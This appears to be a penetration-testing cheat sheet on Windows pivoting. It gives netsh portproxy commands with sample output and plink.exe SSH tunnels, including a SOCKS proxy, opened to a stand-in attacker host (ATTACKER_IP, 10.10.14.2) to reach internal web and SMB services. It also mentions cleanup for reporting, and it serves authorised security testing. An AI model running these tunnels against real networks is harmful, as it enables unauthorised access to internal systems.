WINDOWS PORT FORWARDING

netsh port forward

Built-in Windows forwarding — No tools needed

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
Example Output
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.1.10

Now from attacker:
curl http://PIVOT_IP:8080
(Access internal web app through Windows pivot)

Remove netsh forward

Cleanup — Remove when done

netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Example Output
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

(Clean up after yourself)
(Important for reporting - document cleanup steps)

Show netsh forwards

List active forwards — Verify setup

netsh interface portproxy show all
Example Output
netsh interface portproxy show all

Listen on ipv4:    Connect to ipv4:
Address  Port     Address       Port
0.0.0.0  8080     172.16.1.10   80
0.0.0.0  4445     172.16.1.10   445
(Verify your port forwards are active)

plink.exe (PuTTY SSH)

SSH tunnel from Windows — If SSH client not available

plink.exe -L 8080:INTERNAL:80 user@ATTACKER_IP
Example Output
plink.exe -ssh -L 8080:172.16.1.10:80 attacker@10.10.14.2

OR for dynamic proxy:
plink.exe -ssh -D 1080 attacker@10.10.14.2
(SSH tunneling from Windows when OpenSSH isn't available)